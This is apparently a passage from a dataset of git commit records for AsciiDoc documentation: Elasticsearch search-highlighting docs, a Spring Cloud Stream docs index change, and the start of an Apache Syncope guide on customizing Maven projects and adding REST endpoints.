scissors\" in the fragments list because there\nare more matches in that fragment.\n\n[source,js]\n--------------------------------------------------\n{\n \"query\": {\n \"query_string\": {\n \"query\": \"running scissors\",\n \"fields\": [\"content\", \"content.plain^10\"]\n }\n },\n \"highlight\": {\n \"order\": \"score\",\n \"fields\": {\n \"content\": {\n \"matched_fields\": [\"content\", \"content.plain\"],\n \"type\" : \"fvh\"\n }\n }\n }\n}\n--------------------------------------------------\nThe above highlights \"run\" as well as \"running\" and \"scissors\" but\nstill sorts \"running with scissors\" above \"run with scissors\" because\nthe plain match (\"running\") is boosted.\n\n[source,js]\n--------------------------------------------------\n{\n \"query\": {\n \"query_string\": {\n \"query\": \"running scissors\",\n \"fields\": [\"content\", \"content.plain^10\"]\n }\n },\n \"highlight\": {\n \"order\": \"score\",\n \"fields\": {\n \"content\": {\n \"matched_fields\": [\"content.plain\"],\n \"type\" : \"fvh\"\n }\n }\n }\n}\n--------------------------------------------------\nThe above query wouldn't highlight \"run\" or \"scissor\" but shows that\nit is just fine not to list the field to which the matches are combined\n(`content`) in the matched fields.\n\n[NOTE]\nTechnically it is also fine to add fields to `matched_fields` that\ndon't share the same underlying string as the field to which the matches\nare combined. The results might not make much sense and if one of the\nmatches is off the end of the text then the whole query will fail.\n\n[NOTE]\n===================================================================\nThere is a small amount of overhead involved with setting\n`matched_fields` to a non-empty array so always prefer\n[source,js]\n--------------------------------------------------\n \"highlight\": {\n \"fields\": {\n \"content\": {}\n }\n }\n--------------------------------------------------\nto\n[source,js]\n--------------------------------------------------\n \"highlight\": {\n \"fields\": {\n \"content\": {\n \"matched_fields\": [\"content\"],\n \"type\" : \"fvh\"\n }\n }\n }\n--------------------------------------------------\n===================================================================\n\n[[phrase-limit]]\n==== Phrase Limit\nThe `fast-vector-highlighter` has a `phrase_limit` parameter that prevents\nit from analyzing too many phrases and eating tons of memory. It defaults\nto 256 so only the first 256 matching phrases in the document scored\nconsidered. You can raise the limit with the `phrase_limit` parameter but\nkeep in mind that scoring more phrases consumes more time and memory.\n\nIf using `matched_fields` keep in mind that `phrase_limit` phrases per\nmatched field are considered.\n\n[[explicit-field-order]]\n=== Field Highlight Order\nElasticsearch highlights the fields in the order that they are sent. Per the\njson spec objects are unordered but if you need to be explicit about the order\nthat fields are highlighted then you can use an array for `fields` like this:\n[source,js]\n--------------------------------------------------\n \"highlight\": {\n \"fields\": [\n {\"title\":{ \/*params*\/ }},\n {\"text\":{ \/*params*\/ }}\n ]\n }\n--------------------------------------------------\nNone of the highlighters built into Elasticsearch care about the order that the\nfields are highlighted but a plugin may.\n","old_contents":"[[search-request-highlighting]]\n=== Highlighting\n\nAllows to highlight search results on one or more fields. The\nimplementation uses either the lucene `highlighter`, `fast-vector-highlighter`\nor `postings-highlighter`. The following is an example of the search request\nbody:\n\n[source,js]\n--------------------------------------------------\n{\n \"query\" : {...},\n \"highlight\" : {\n \"fields\" : {\n \"content\" : {}\n }\n }\n}\n--------------------------------------------------\n\nIn the above case, the `content` field will be highlighted for each\nsearch hit (there will be another element in each search hit, called\n`highlight`, which includes the highlighted fields and the highlighted\nfragments).\n\nIn order to perform highlighting, the actual content of the field is\nrequired. If the field in question is stored (has `store` set to `true`\nin the mapping) it will be used, otherwise, the actual `_source` will\nbe loaded and the relevant field will be extracted from it.\n\nThe field name supports wildcard notation. For example, using `comment_*`\nwill cause all fields that match the expression to be highlighted.\n\n==== Postings highlighter\n\nIf `index_options` is set to `offsets` in the mapping the postings highlighter\nwill be used instead of the plain highlighter. The postings highlighter:\n\n* Is faster since it doesn't require to reanalyze the text to be highlighted:\nthe larger the documents the better the performance gain should be\n* Requires less disk space than term_vectors, needed for the fast vector\nhighlighter\n* Breaks the text into sentences and highlights them. Plays really well with\nnatural languages, not as well with fields containing for instance html markup\n* Treats the document as the whole corpus, and scores individual sentences as\nif they were documents in this corpus, using the BM25 algorithm\n\nHere is an example of setting the `content` field to allow for\nhighlighting using the postings highlighter on it:\n\n[source,js]\n--------------------------------------------------\n{\n \"type_name\" : {\n \"content\" : {\"index_options\" : \"offsets\"}\n }\n}\n--------------------------------------------------\n\n[NOTE]\nNote that the postings highlighter is meant to perform simple query terms\nhighlighting, regardless of their positions. That means that when used for\ninstance in combination with a phrase query, it will highlight all the terms\nthat the query is composed of, regardless of whether they are actually part of\na query match, effectively ignoring their positions.\n\n[WARNING]\nThe postings highlighter does support highlighting of multi term queries, like\nprefix queries, wildcard queries and so on. On the other hand, this requires\nthe queries to be rewritten using a proper\n<<query-dsl-multi-term-rewrite,rewrite method>> that supports multi term\nextraction, which is a potentially expensive operation.\n\n\n==== Fast vector highlighter\n\nIf `term_vector` information is provided by setting `term_vector` to\n`with_positions_offsets` in the mapping then the fast vector highlighter\nwill be used instead of the plain highlighter. The fast vector highlighter:\n\n* Is faster especially for large fields (> `1MB`)\n* Can be customized with `boundary_chars`, `boundary_max_scan`, and\n `fragment_offset` (see <<boundary-characters,below>>)\n* Requires setting `term_vector` to `with_positions_offsets` which\n increases the size of the index\n* Can combine matches from multiple fields into one result. See\n `matched_fields`\n* Can assign different weights to matches at different positions allowing\n for things like phrase matches being sorted above term matches when\n highlighting a Boosting Query that boosts phrase matches over term matches\n\nHere is an example of setting the `content` field to allow for\nhighlighting using the fast vector highlighter on it (this will cause\nthe index to be bigger):\n\n[source,js]\n--------------------------------------------------\n{\n \"type_name\" : {\n \"content\" : {\"term_vector\" : \"with_positions_offsets\"}\n }\n}\n--------------------------------------------------\n\n==== Force highlighter type\n\nThe `type` field allows to force a specific highlighter type. This is useful\nfor instance when needing to use the plain highlighter on a field that has\n`term_vectors` enabled. The allowed values are: `plain`, `postings` and `fvh`.\nThe following is an example that forces the use of the plain highlighter:\n\n[source,js]\n--------------------------------------------------\n{\n \"query\" : {...},\n \"highlight\" : {\n \"fields\" : {\n \"content\" : {\"type\" : \"plain\"}\n }\n }\n}\n--------------------------------------------------\n\n==== Force highlighting on source\n\nadded[1.0.0.RC1]\n\nForces the highlighting to highlight fields based on the source even if fields are\nstored separately. Defaults to `false`.\n\n[source,js]\n--------------------------------------------------\n{\n \"query\" : {...},\n \"highlight\" : {\n \"fields\" : {\n \"content\" : {\"force_source\" : true}\n }\n }\n}\n--------------------------------------------------\n\n[[tags]]\n==== Highlighting Tags\n\nBy default, the highlighting will wrap highlighted text in `<em>` and\n`<\/em>`. This can be controlled by setting `pre_tags` and `post_tags`,\nfor example:\n\n[source,js]\n--------------------------------------------------\n{\n \"query\" : {...},\n \"highlight\" : {\n \"pre_tags\" : [\"<tag1>\"],\n \"post_tags\" : [\"<\/tag1>\"],\n \"fields\" : {\n \"_all\" : {}\n }\n }\n}\n--------------------------------------------------\n\nUsing the fast vector highlighter there can be more tags, and the \"importance\"\nis ordered.\n\n[source,js]\n--------------------------------------------------\n{\n \"query\" : {...},\n \"highlight\" : {\n \"pre_tags\" : [\"<tag1>\", \"<tag2>\"],\n \"post_tags\" : [\"<\/tag1>\", \"<\/tag2>\"],\n \"fields\" : {\n \"_all\" : {}\n }\n }\n}\n--------------------------------------------------\n\nThere are also built in \"tag\" schemas, with currently a single schema\ncalled `styled` with the following `pre_tags`:\n\n[source,js]\n--------------------------------------------------\n<em class=\"hlt1\">, <em class=\"hlt2\">, <em class=\"hlt3\">,\n<em class=\"hlt4\">, <em class=\"hlt5\">, <em class=\"hlt6\">,\n<em class=\"hlt7\">, <em class=\"hlt8\">, <em class=\"hlt9\">,\n<em class=\"hlt10\">\n--------------------------------------------------\n\nand `<\/em>` as `post_tags`. If you think of more nice to have built in tag\nschemas, just send an email to the mailing list or open an issue. Here\nis an example of switching tag schemas:\n\n[source,js]\n--------------------------------------------------\n{\n \"query\" : {...},\n \"highlight\" : {\n \"tags_schema\" : \"styled\",\n \"fields\" : {\n \"content\" : {}\n }\n }\n}\n--------------------------------------------------\n\n\n==== Encoder\n\nAn `encoder` parameter can be used to define how highlighted text will\nbe encoded. It can be either `default` (no encoding) or `html` (will\nescape html, if you use html highlighting tags).\n\n==== Highlighted Fragments\n\nEach field highlighted can control the size of the highlighted fragment\nin characters (defaults to `100`), and the maximum number of fragments\nto return (defaults to `5`).\nFor example:\n\n[source,js]\n--------------------------------------------------\n{\n \"query\" : {...},\n \"highlight\" : {\n \"fields\" : {\n \"content\" : {\"fragment_size\" : 150, \"number_of_fragments\" : 3}\n }\n }\n}\n--------------------------------------------------\n\nThe `fragment_size` is ignored when using the postings highlighter, as it\noutputs sentences regardless of their length.\n\nOn top of this it is possible to specify that highlighted fragments need\nto be sorted by score:\n\n[source,js]\n--------------------------------------------------\n{\n \"query\" : {...},\n \"highlight\" : {\n \"order\" : \"score\",\n \"fields\" : {\n \"content\" : {\"fragment_size\" : 150, \"number_of_fragments\" : 3}\n }\n }\n}\n--------------------------------------------------\n\nIf the `number_of_fragments` value is set to `0` then no fragments are\nproduced, instead the whole content of the field is returned, and of\ncourse it is highlighted. This can be very handy if short texts (like\ndocument title or address) need to be highlighted but no fragmentation\nis required. Note that `fragment_size` is ignored in this case.\n\n[source,js]\n--------------------------------------------------\n{\n \"query\" : {...},\n \"highlight\" : {\n \"fields\" : {\n \"_all\" : {},\n \"bio.title\" : {\"number_of_fragments\" : 0}\n }\n }\n}\n--------------------------------------------------\n\nWhen using `fast-vector-highlighter` one can use `fragment_offset`\nparameter to control the margin to start highlighting from.\n\nIn the case where there is no matching fragment to highlight, the default is\nto not return anything. Instead, we can return a snippet of text from the\nbeginning of the field by setting `no_match_size` (default `0`) to the length\nof the text that you want returned. The actual length may be shorter than\nspecified as it tries to break on a word boundary. When using the postings\nhighlighter it is not possible to control the actual size of the snippet,\ntherefore the first sentence gets returned whenever `no_match_size` is\ngreater than `0`.\n\n[source,js]\n--------------------------------------------------\n{\n \"query\" : {...},\n \"highlight\" : {\n \"fields\" : {\n \"content\" : {\n \"fragment_size\" : 150,\n \"number_of_fragments\" : 3,\n \"no_match_size\": 150\n }\n }\n }\n}\n--------------------------------------------------\n\n\n==== Highlight query\n\nIt is also possible to highlight against a query other than the search\nquery by setting `highlight_query`. This is especially useful if you\nuse a rescore query because those are not taken into account by\nhighlighting by default. Elasticsearch does not validate that\n`highlight_query` contains the search query in any way so it is possible\nto define it so legitimate query results aren't highlighted at all.\nGenerally it is better to include the search query in the\n`highlight_query`. Here is an example of including both the search\nquery and the rescore query in `highlight_query`.\n[source,js]\n--------------------------------------------------\n{\n \"fields\": [ \"_id\" ],\n \"query\" : {\n \"match\": {\n \"content\": {\n \"query\": \"foo bar\"\n }\n }\n },\n \"rescore\": {\n \"window_size\": 50,\n \"query\": {\n \"rescore_query\" : {\n \"match_phrase\": {\n \"content\": {\n \"query\": \"foo bar\",\n \"phrase_slop\": 1\n }\n }\n },\n \"rescore_query_weight\" : 10\n }\n },\n \"highlight\" : {\n \"order\" : \"score\",\n \"fields\" : {\n \"content\" : {\n \"fragment_size\" : 150,\n \"number_of_fragments\" : 3,\n \"highlight_query\": {\n \"bool\": {\n \"must\": {\n \"match\": {\n \"content\": {\n \"query\": \"foo bar\"\n }\n }\n },\n \"should\": {\n \"match_phrase\": {\n \"content\": {\n \"query\": \"foo bar\",\n \"phrase_slop\": 1,\n \"boost\": 10.0\n }\n }\n },\n \"minimum_should_match\": 0\n }\n }\n }\n }\n }\n}\n--------------------------------------------------\n\nNote that the score of text fragment in this case is calculated by the Lucene\nhighlighting framework. For implementation details you can check the\n`ScoreOrderFragmentsBuilder.java` class. On the other hand when using the\npostings highlighter the fragments are scored using, as mentioned above,\nthe BM25 algorithm.\n\n[[highlighting-settings]]\n==== Global Settings\n\nHighlighting settings can be set on a global level and then overridden\nat the field level.\n\n[source,js]\n--------------------------------------------------\n{\n \"query\" : {...},\n \"highlight\" : {\n \"number_of_fragments\" : 3,\n \"fragment_size\" : 150,\n \"tag_schema\" : \"styled\",\n \"fields\" : {\n \"_all\" : { \"pre_tags\" : [\"<em>\"], \"post_tags\" : [\"<\/em>\"] },\n \"bio.title\" : { \"number_of_fragments\" : 0 },\n \"bio.author\" : { \"number_of_fragments\" : 0 },\n \"bio.content\" : { \"number_of_fragments\" : 5, \"order\" : \"score\" }\n }\n }\n}\n--------------------------------------------------\n\n[[field-match]]\n==== Require Field Match\n\n`require_field_match` can be set to `true` which will cause a field to\nbe highlighted only if a query matched that field. `false` means that\nterms are highlighted on all requested fields regardless if the query\nmatches specifically on them.\n\n[[boundary-characters]]\n==== Boundary Characters\n\nWhen highlighting a field using the fast vector highlighter,\n`boundary_chars` can be configured to define what constitutes a boundary\nfor highlighting. It's a single string with each boundary character\ndefined in it. It defaults to `.,!? \\t\\n`.\n\nThe `boundary_max_scan` allows to control how far to look for boundary\ncharacters, and defaults to `20`.\n\n\n[[matched-fields]]\n==== Matched Fields\nThe Fast Vector Highlighter can combine matches on multiple fields to\nhighlight a single field using `matched_fields`. This is most\nintuitive for multifields that analyze the same string in different\nways. All `matched_fields` must have `term_vector` set to\n`with_positions_offsets` but only the field to which the matches are\ncombined is loaded so only that field would benefit from having\n`store` set to `yes`.\n\nIn the following examples `content` is analyzed by the `english`\nanalyzer and `content.plain` is analyzed by the `standard` analyzer.\n\n[source,js]\n--------------------------------------------------\n{\n \"query\": {\n \"query_string\": {\n \"query\": \"content.plain:running scissors\",\n \"fields\": [\"content\"]\n }\n },\n \"highlight\": {\n \"order\": \"score\",\n \"fields\": {\n \"content\": {\n \"matched_fields\": [\"content\", \"content.plain\"],\n \"type\" : \"fvh\"\n }\n }\n }\n}\n--------------------------------------------------\nThe above matches both \"run with scissors\" and \"running with scissors\"\nand would highlight \"running\" and \"scissors\" but not \"run\". If both\nphrases appear in a large document then \"running with scissors\" is\nsorted above \"run with scissors\" in the fragments list because there\nare more matches in that fragment.\n\n[source,js]\n--------------------------------------------------\n{\n \"query\": {\n \"query_string\": {\n \"query\": \"running scissors\",\n \"fields\": [\"content\", \"content.plain^10\"]\n }\n },\n \"highlight\": {\n \"order\": \"score\",\n \"fields\": {\n \"content\": {\n \"matched_fields\": [\"content\", \"content.plain\"],\n \"type\" : \"fvh\"\n }\n }\n }\n}\n--------------------------------------------------\nThe above highlights \"run\" as well as \"running\" and \"scissors\" but\nstill sorts \"running with scissors\" above \"run with scissors\" because\nthe plain match (\"running\") is boosted.\n\n[source,js]\n--------------------------------------------------\n{\n \"query\": {\n \"query_string\": {\n \"query\": \"running scissors\",\n \"fields\": [\"content\", \"content.plain^10\"]\n }\n },\n \"highlight\": {\n \"order\": \"score\",\n \"fields\": {\n \"content\": {\n \"matched_fields\": [\"content.plain\"],\n \"type\" : \"fvh\"\n }\n }\n }\n}\n--------------------------------------------------\nThe above query wouldn't highlight \"run\" or \"scissor\" but shows that\nit is just fine not to list the field to which the matches are combined\n(`content`) in the matched fields.\n\n[NOTE]\nTechnically it is also fine to add fields to `matched_fields` that\ndon't share the same underlying string as the field to which the matches\nare combined. The results might not make much sense and if one of the\nmatches is off the end of the text then the whole query will fail.\n\n[NOTE]\n===================================================================\nThere is a small amount of overhead involved with setting\n`matched_fields` to a non-empty array so always prefer\n[source,js]\n--------------------------------------------------\n \"highlight\": {\n \"fields\": {\n \"content\": {}\n }\n }\n--------------------------------------------------\nto\n[source,js]\n--------------------------------------------------\n \"highlight\": {\n \"fields\": {\n \"content\": {\n \"matched_fields\": [\"content\"],\n \"type\" : \"fvh\"\n }\n }\n }\n--------------------------------------------------\n===================================================================\n\n[[phrase-limit]]\n==== Phrase Limit\nThe `fast-vector-highlighter` has a `phrase_limit` parameter that prevents\nit from analyzing too many phrases and eating tons of memory. It defaults\nto 256 so only the first 256 matching phrases in the document scored\nconsidered. You can raise the limit with the `phrase_limit` parameter but\nkeep in mind that scoring more phrases consumes more time and memory.\n\nIf using `matched_fields` keep in mind that `phrase_limit` phrases per\nmatched field are considered.\n\n[[explicit-field-order]]\n=== Field Highlight Order\nElasticsearch highlights the fields in the order that they are sent. Per the\njson spec objects are unordered but if you need to be explicit about the order\nthat fields are highlighted then you can use an array for `fields` like this:\n[source,js]\n--------------------------------------------------\n \"highlight\": {\n \"fields\": [\n {\"title\":{ \/*params*\/ }},\n {\"text\":{ \/*params*\/ }}\n ]\n }\n--------------------------------------------------\nNone of the highlighters built into Elasticsearch care about the order that the\nfields are highlighted but a plugin may.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f6d0e23ddc81e2d6e448117ec8a4c6dddf51c92f","subject":"Show KStreams binder as a top-level section in the docs (#44)","message":"Show KStreams binder as a top-level section in the docs (#44)\n\n","repos":"spring-cloud\/spring-cloud-stream,spring-cloud\/spring-cloud-stream,garyrussell\/spring-cloud-stream,garyrussell\/spring-cloud-stream,spring-cloud\/spring-cloud-stream,garyrussell\/spring-cloud-stream","old_file":"spring-cloud-stream-docs\/src\/main\/asciidoc\/spring-cloud-stream-aggregate.adoc","new_file":"spring-cloud-stream-docs\/src\/main\/asciidoc\/spring-cloud-stream-aggregate.adoc","new_contents":"include::{stream-docs-basedir}\/core\/spring-cloud-stream-core-docs\/src\/main\/asciidoc\/spring-cloud-stream-overview.adoc[]\n\n= Binder Implementations\n\n== Apache Kafka Binder\n\ninclude::{stream-docs-basedir}\/kafka\/spring-cloud-stream-binder-kafka-docs\/src\/main\/asciidoc\/spring-cloud-stream-binder-kafka-aggregate.adoc[leveloffset=+1]\n\n== Apache Kafka Streams Binder\n\ninclude::{stream-docs-basedir}\/kafka\/spring-cloud-stream-binder-kafka-docs\/src\/main\/asciidoc\/kafka-streams.adoc[leveloffset=+1]\n\n== RabbitMQ Binder\n\ninclude::{stream-docs-basedir}\/rabbit\/spring-cloud-stream-binder-rabbit-docs\/src\/main\/asciidoc\/spring-cloud-stream-binder-rabbit-aggregate.adoc[leveloffset=+1]\n","old_contents":"include::{stream-docs-basedir}\/core\/spring-cloud-stream-core-docs\/src\/main\/asciidoc\/spring-cloud-stream-overview.adoc[]\n\n= Binder Implementations\n\n== Apache Kafka Binder\n\ninclude::{stream-docs-basedir}\/kafka\/spring-cloud-stream-binder-kafka-docs\/src\/main\/asciidoc\/spring-cloud-stream-binder-kafka-aggregate.adoc[leveloffset=+1]\n\n== RabbitMQ Binder\n\ninclude::{stream-docs-basedir}\/rabbit\/spring-cloud-stream-binder-rabbit-docs\/src\/main\/asciidoc\/spring-cloud-stream-binder-rabbit-aggregate.adoc[leveloffset=+1]\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d490b45c194f621ce2faf66f1f03b8f89a97fae5","subject":"Fixing typo","message":"Fixing typo\n","repos":"ilgrosso\/syncope,ilgrosso\/syncope,apache\/syncope,ilgrosso\/syncope,apache\/syncope,ilgrosso\/syncope,apache\/syncope,apache\/syncope","old_file":"src\/main\/asciidoc\/reference-guide\/workingwithapachesyncope\/customization.adoc","new_file":"src\/main\/asciidoc\/reference-guide\/workingwithapachesyncope\/customization.adoc","new_contents":"\/\/\n\/\/ Licensed to the Apache Software Foundation (ASF) under one\n\/\/ or more contributor license agreements. See the NOTICE file\n\/\/ distributed with this work for additional information\n\/\/ regarding copyright ownership. The ASF licenses this file\n\/\/ to you under the Apache License, Version 2.0 (the\n\/\/ \"License\"); you may not use this file except in compliance\n\/\/ with the License. You may obtain a copy of the License at\n\/\/\n\/\/ http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\/\/\n\/\/ Unless required by applicable law or agreed to in writing,\n\/\/ software distributed under the License is distributed on an\n\/\/ \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n\/\/ KIND, either express or implied. See the License for the\n\/\/ specific language governing permissions and limitations\n\/\/ under the License.\n\/\/\n=== Customization\n\n[CAUTION]\nOnly Maven projects can be customized: if using Standalone, Debian packages or the GUI installer, none of the\ncustomizations discussed below can be applied.\n\nApache Syncope is designed to be as flexible as possible, to best suit the various environments\nin which it can be deployed. Besides other aspects, this means that every feature and component can be extended or\nreplaced.\n\nOnce the project has been created from the provided Maven archetype, the generated source tree is available for either\nadding new features or replacing existing components.\n\n[[override-behavior]]\n[TIP]\n.Override behavior\n====\nAs a rule of thumb, any file of the local project will take precedence over a file with the same name in the same\ndirectory of the standard Apache Syncope release.\n\nFor example, if you place\n\n core\/spring\/src\/main\/java\/org\/apache\/syncope\/core\/spring\/security\/SyncopeAuthenticationProvider.java\n\nin the local project, this file will be picked up instead of\nifeval::[\"{snapshotOrRelease}\" == \"release\"]\nhttps:\/\/github.com\/apache\/syncope\/blob\/syncope-{docVersion}\/core\/spring\/src\/main\/java\/org\/apache\/syncope\/core\/spring\/security\/SyncopeAuthenticationProvider.java[SyncopeAuthenticationProvider^].\nendif::[]\nifeval::[\"{snapshotOrRelease}\" == \"snapshot\"]\nhttps:\/\/github.com\/apache\/syncope\/blob\/master\/core\/spring\/src\/main\/java\/org\/apache\/syncope\/core\/spring\/security\/SyncopeAuthenticationProvider.java[SyncopeAuthenticationProvider^].\nendif::[]\n\nThe same happens with resources as images or HTML files; if you place\n\n console\/src\/main\/resources\/org\/apache\/syncope\/client\/console\/pages\/BasePage.html\n\nin the local project, this file will be picked up instead of\nifeval::[\"{snapshotOrRelease}\" == \"release\"]\nhttps:\/\/github.com\/apache\/syncope\/blob\/syncope-{docVersion}\/client\/console\/src\/main\/resources\/org\/apache\/syncope\/client\/console\/pages\/BasePage.html[BasePage.html^].\nendif::[]\nifeval::[\"{snapshotOrRelease}\" == \"snapshot\"]\nhttps:\/\/github.com\/apache\/syncope\/blob\/master\/client\/console\/src\/main\/resources\/org\/apache\/syncope\/client\/console\/pages\/BasePage.html[BasePage.html^].\nendif::[]\n\nThis general behavior might have exceptions, as highlighted below.\n====\n\nIn general, the Embedded Mode (see the\nifeval::[\"{backend}\" == \"html5\"]\nhttp:\/\/syncope.apache.org\/docs\/getting-started.html[Apache Syncope Getting Started Guide]\nendif::[]\nifeval::[\"{backend}\" == \"pdf\"]\nhttp:\/\/syncope.apache.org\/docs\/getting-started.pdf[Apache Syncope Getting Started Guide]\nendif::[]\nfor details) allows the user to work comfortably from a single workstation, with no need of additional setup; it is\neffectively implemented as the `all`\nhttps:\/\/maven.apache.org\/guides\/introduction\/introduction-to-profiles.html[Maven profile^], where the available optional\ncomponents and extensions are enabled. +\nWhen deploying the generated WAR artifacts into an external <<javaee-container>> however, the required components and\nextensions need to be explicitly selected and enabled, as shown in the following text.\n\n[[deployment-directories]]\n.Deployment directories\n****\nApache Syncope needs three base directories to be defined:\n\n* bundles - where the <<external-resources,connector bundles>> are stored;\n* log - where all the system logs are written;\n* conf (optional) - where configuration files are located, if overriding the default values is needed.\n\n[WARNING]\nThe `bundles` directory should only contain connector bundle JAR files. +\nThe presence of any other file might cause the unavailability of any connector bundle in Apache Syncope.\n\nFor reference, the suggested directory layout can be created as follows:\n\n....\n$ mkdir \/opt\/syncope\n$ mkdir \/opt\/syncope\/bundles\n$ mkdir \/opt\/syncope\/log\n$ mkdir \/opt\/syncope\/conf\n....\n****\n\nThe WAR artifacts are generated by running the Maven command (with reference to the suggested directory layout):\n\n....\nmvn clean verify \\\n -Dconf.directory=\/opt\/syncope\/conf \\\n -Dbundles.directory=\/opt\/syncope\/bundles \\\n -Dlog.directory=\/opt\/syncope\/log\n....\n\nAfter downloading all of the dependencies that are needed, three WAR files will be produced:\n\n. `core\/target\/syncope.war`\n. `console\/target\/syncope-console.war`\n. `enduser\/target\/syncope-enduser.war`\n\nIf no failures are encountered, your basic Apache Syncope project is now ready to be deployed.\n\n[[embedded-debug]]\n[TIP]\n.JPDA Debug in Embedded Mode\n====\nThe Java\u2122 Platform Debugger Architecture (http:\/\/docs.oracle.com\/javase\/8\/docs\/technotes\/guides\/jpda\/index.html[JPDA^])\nis a collection of APIs aimed to help with debugging Java code.\n\nEnhancing the `embedded` profile of the `enduser` module to enable the JPDA socket is quite\nstraightforward: just add the `<profile>` below to `enduser\/pom.xml`:\n\n[source,xml,subs=\"verbatim,attributes\"]\n----\n<profile>\n <id>debug<\/id>\n\n <build>\n <plugins>\n <plugin>\n <groupId>org.codehaus.cargo<\/groupId>\n <artifactId>cargo-maven2-plugin<\/artifactId>\n <inherited>true<\/inherited>\n <configuration>\n <configuration>\n <properties>\n <cargo.jvmargs>\n -Xdebug\n -Xrunjdwp:transport=dt_socket,address=8000,server=y,suspend=n\n -noverify -XX:+CMSClassUnloadingEnabled\n -XX:+UseConcMarkSweepGC -Xmx1024m -Xms512m\n <\/cargo.jvmargs>\n <\/properties>\n <\/configuration>\n <\/configuration>\n <\/plugin>\n <\/plugins>\n <\/build>\n<\/profile>\n----\n\nNow, from the `enduser` subdirectory, execute:\n\n[source,bash]\nmvn -P embedded,debug\n\nAt this point your favorite IDE can be attached to the port `8000`; please note that you might need to add\n`-XX:MaxPermSize=512m` to `<cargo.jvmargs>` in order to run with JDK 7.\n====\n\n[[customization-core]]\n==== Core\n\n[CAUTION]\nWhen providing custom Java classes implementing the defined interfaces or extending the existing\nimplementations, their package *must* be rooted under `org.apache.syncope.core`, otherwise they will not be available\nat runtime.\n\nBesides replacing existing classes as explained <<override-behavior,above>>, new implementations can be provided under\n`core\/src\/main\/java` for the following components:\n\n* <<propagationactions,propagation>>, <<pushactions,push>>, <<pullactions,pull>> and <<logicactions,logic>> actions\n* <<push-correlation-rules,push>> \/ <<pull-correlation-rules,pull>> correlation rules\n* <<pull-mode,reconciliation filter builders>>\n* <<tasks-custom,custom tasks>>\n* <<reportlets,reportlets>>\n* <<account-rules,account>> and <<password-rules,password>> rules for policies\n* <<plain,plain schema validators>>\n* <<mapping,mapping item transformers>>\n* <<virtual-attribute-cache,virtual attribute cache>>\n* <<workflow-adapters,workflow adapters>>\n* <<provisioning-managers,provisioning managers>>\n* <<notifications,notification recipient providers>>\n\n[[new-rest-endpoints]]\n[TIP]\n.New REST endpoints\n====\nAdding a new REST endpoint involves several operations:\n\n. create - in an extension's `rest-api` module or under `common` otherwise - a Java interface with package\n`org.apache.syncope.common.rest.api.service` and proper JAX-RS annotations; check\nifeval::[\"{snapshotOrRelease}\" == \"release\"]\nhttps:\/\/github.com\/apache\/syncope\/blob\/syncope-{docVersion}\/ext\/camel\/rest-api\/src\/main\/java\/org\/apache\/syncope\/common\/rest\/api\/service\/CamelRouteService.java[CamelRouteService^]\nendif::[]\nifeval::[\"{snapshotOrRelease}\" == \"snapshot\"]\nhttps:\/\/github.com\/apache\/syncope\/blob\/master\/ext\/camel\/rest-api\/src\/main\/java\/org\/apache\/syncope\/common\/rest\/api\/service\/CamelRouteService.java[CamelRouteService^]\nendif::[]\nfor reference;\n. if needed, define supporting payload objects - in an extension's `common-lib` module or under `common` otherwise;\ncheck\nifeval::[\"{snapshotOrRelease}\" == \"release\"]\nhttps:\/\/github.com\/apache\/syncope\/blob\/syncope-{docVersion}\/ext\/camel\/common-lib\/src\/main\/java\/org\/apache\/syncope\/common\/lib\/to\/CamelRouteTO.java[CamelRouteTO^]\nendif::[]\nifeval::[\"{snapshotOrRelease}\" == \"snapshot\"]\nhttps:\/\/github.com\/apache\/syncope\/blob\/master\/ext\/camel\/common-lib\/src\/main\/java\/org\/apache\/syncope\/common\/lib\/to\/CamelRouteTO.java[CamelRouteTO^]\nendif::[]\nfor reference;\n. implement - in an extension's `rest-cxf` module or under `core` otherwise - the interface defined above in a Java\nclass with package `org.apache.syncope.core.rest.cxf.service`; check\nifeval::[\"{snapshotOrRelease}\" == \"release\"]\nhttps:\/\/github.com\/apache\/syncope\/blob\/syncope-{docVersion}\/ext\/camel\/rest-cxf\/src\/main\/java\/org\/apache\/syncope\/core\/rest\/cxf\/service\/CamelRouteServiceImpl.java[CamelRouteServiceImpl^]\nendif::[]\nifeval::[\"{snapshotOrRelease}\" == \"snapshot\"]\nhttps:\/\/github.com\/apache\/syncope\/blob\/master\/ext\/camel\/rest-cxf\/src\/main\/java\/org\/apache\/syncope\/core\/rest\/cxf\/service\/CamelRouteServiceImpl.java[CamelRouteServiceImpl^]\nendif::[]\nfor reference.\n\nBy following such conventions, the new REST endpoint will be automatically picked up alongside the default services.\n====\n\n[WARNING]\n====\nThe <<override-behavior,override behavior>> might have exceptions; if you need to customize one of the\nSpring context definitions. For example, if you want to customize \nifeval::[\"{snapshotOrRelease}\" == \"release\"]\nhttps:\/\/github.com\/apache\/syncope\/blob\/syncope-{docVersion}\/core\/spring\/src\/main\/resources\/securityContext.xml[securityContext.xml^]\nendif::[]\nifeval::[\"{snapshotOrRelease}\" == \"snapshot\"]\nhttps:\/\/github.com\/apache\/syncope\/blob\/master\/core\/spring\/src\/main\/resources\/securityContext.xml[securityContext.xml^]\nendif::[]\n, you will also need to replace the following text in `core\/src\/main\/webapp\/WEB-INF\/web.xml`,\n\n....\nclasspath*:\/*Context.xml\n....\n\nwith\n\n....\nclasspath:\/coreContext.xml\nclasspath:\/securityContext.xml\nclasspath*:\/logicContext.xml\nclasspath*:\/restCXFContext.xml\nclasspath*:\/persistenceContext.xml\nclasspath*:\/provisioningContext.xml\nclasspath*:\/workflowContext.xml\n....\n\nto be sure that `core\/src\/main\/resources\/securityContext.xml` is picked up. +\nPlease also note that the actual list of Spring context files to include might depend on the configured extensions.\n====\n\n[discrete]\n===== Select the <<activiti-user-workflow-adapter>>\n\nAdd the following dependency to `core\/pom.xml`:\n\n[source,xml,subs=\"verbatim,attributes\"]\n----\n<dependency>\n <groupId>org.apache.syncope.core<\/groupId>\n <artifactId>syncope-core-workflow-activiti<\/artifactId>\n <version>${syncope.version}<\/version>\n<\/dependency>\n----\n\nCopy `core\/src\/main\/resources\/all\/workflow.properties` to `core\/src\/main\/resources\/workflow.properties`.\n\n[discrete]\n===== Enable the <<apache-camel-provisioning-manager>>\n\nAdd the following dependencies to 